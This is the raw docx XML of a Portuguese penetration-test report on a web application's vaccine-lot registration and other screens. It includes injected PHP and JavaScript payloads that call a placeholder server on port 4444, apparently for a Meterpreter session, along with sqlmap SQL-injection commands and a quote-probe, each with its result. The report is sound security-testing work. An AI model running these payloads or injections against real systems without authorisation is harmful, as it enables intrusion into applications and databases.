          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no test</w:t>
      </w:r>
      <w:r w:rsidRPr="00751591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>e.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> A sessão do Meterpreter não foi aberta.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Tentativa 3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F34CCA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Alterar o comando utilizado na tentativa 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> para tentar descobrir o que impediu a sessão do Meterpreter ser aberta.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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?php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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$curl = curl_init('http://</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6E06">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP_do_servidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:4444');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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if(!curl_exec($curl)){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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>javascript:alert(curl_error($curl));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}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curl_close($curl);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?&gt;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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00BC192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F34CCA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Não foi possível armazenar o comando usado no ataque, porque o tamanho limite permitido na base de dados da aplicação para o campo utilizado no teste é menor que a quantidade de caracteres utilizados do comando.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F34CCA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F34CCA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tentativa 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F34CCA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F34CCA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8A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ao contrário das demais tentativas que utilizavam códigos php, aqui foram utilizados códigos de Javascript puro, que os navegadores conseguem ler. O esperado é que a aplicação realizasse algum tratamento para impedir o código de ser executado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F34CCA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220"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00455AB7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="220"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r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 xml:space="preserve">r = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r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 xml:space="preserve">(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="220"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r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>r.open(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"GET"</w:t>
      </w:r>
      <w:r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>,’http://IP_do_servidor:4444’,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r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>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="220"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>.send();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&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>script&gt;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</w:t>
      </w:r>
      <w:r w:rsidRPr="00487697">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Não passou no teste.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00751591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Independente da sessão do Meterpreter não ser aberta, o</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> código conseguiu ser inserido e executado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRDefault="00751591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2719E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  <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tela Cadastro </w:t>
      </w:r>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lotes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Vacinas – Exploração via SQL Injection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dia 24/04/16.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Duração: 1 hora e 22 minutos.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Objetivo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Tentar realizar consultas não autorizadas no banco de dados por meio da injeção de SQL nos campos da tela de Cadastro Lotes de Vacinas.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Tentativa 1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Descobrir se o campo Marca/Fabricante é vulnerável a SQL Injection através das aspas simples.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>Comando: 1 ‘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O uso de aspas simples aqui é o teste mais básico de vulnerabilidade de um campo para SQL Injection. Imagina-se que haja por baixo uma instrução SQL que possua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where param1 = &lt;parametro_na_interface&gt; and …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594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Caso a aplicação não fizesse o devido tratamento do comando inserido e a instrução fosse ser modificada para </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">where param1  = 1 ‘ . </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>O que ocasionaria um erro de SQL.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</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no teste.</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Colocando 1‘ no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> campo </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB70B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Marca/Fabricante</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> o cadastro aconteceu normalmente. Isso indica que a aplicação está fazendo um tratamento adequado para os dados de entrada e por isso o campo não é vulnerável.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Tentativa 2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Usar a ferramenta Sqlmap para realizar a tentativa de injetar SQL na página.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Salvar a requisição POST capturada pela ferramenta Burp Suite em um arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>a parte para ser utilizado pelo Sqlmap posteriormente.[2]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lastRenderedPageBreak/>
        <w:t>Comando utilizado: sqlmap -r params -p --current-db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29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comando “-r” informa que as instruções do ataque devem ser carregadas no arquivo params.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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“-p” indica o parâmetro que deve ser injetado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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“--current-db” solicita que o Sqlmap que tente descobrir qual o banco da aplicação alvo.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Erro na ferramenta. </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>O Sqlmap não reconhece o parâmetro, que está no arquivo indicado no comando.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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tentativa 3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>Alterar o comando</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizado na Tentativa 2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> para incluir o parâmetro solicitado pela ferramenta.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</w:rPr>
        <w:t>O comando do Sqlm</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ap pede que seja informado um parâmetro para possível injeção</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> de SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Foi esperado que a aplicação fizesse o devido tratamento dos parâmetros.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i/>
          <w:iCs/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>omando</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizado</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>: sqlmap -r params -p descricao --current-db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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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 w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">O comando “-r” indica ao programa que as instruções do ataque </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>devem ser</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> carregadas no arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>params</w:t>
      </w:r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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-p” i</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ndica o parâmetro que deve ser injetado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003A39F6" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“descrição” é o parâmetro que sofrerá tentativa de injeção</w:t>
      </w:r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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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 w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“--current-db” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>comando utilizado para</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> descobrir qual o banco da aplicação alvo.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 w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>assou no teste</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. O parâmetro escolhido para teste de injeção SQL não é injetável conforme mostra a figura 17.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84"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BC1742" w:rsidRDefault="00BC1742" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BC1742" w:rsidRDefault="00BC1742" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BC1742" w:rsidRDefault="00BC1742" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="4133850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8.jpe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Default="00BC1742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18</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado aplicação SQL Injection via Sqlmap</w:t>
      </w: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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tentativa 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594AD8" w:rsidRPr="003A39F6" w:rsidRDefault="008C6DC7" w:rsidP="00594AD8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>Alterar o comando</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizado nas tentativas anteriores</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> para incluir o parâmetro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>validade</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Foi esperado que a aplicação fizesse o devido tratamento dos parâmetros.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</w:rPr>
        <w:t xml:space="preserve">Tentar </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">injeção </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>de SQL n</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>o parâmetro “validade”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>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i/>
          <w:iCs/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>omando: sqlmap -r params -p validade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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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 w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">O comando “-r” indica ao programa que as instruções do ataque </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>devem ser</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> carregadas no arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>params</w:t>
      </w:r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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-p” i</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ndica o parâmetro que deve ser injetado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003A39F6" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
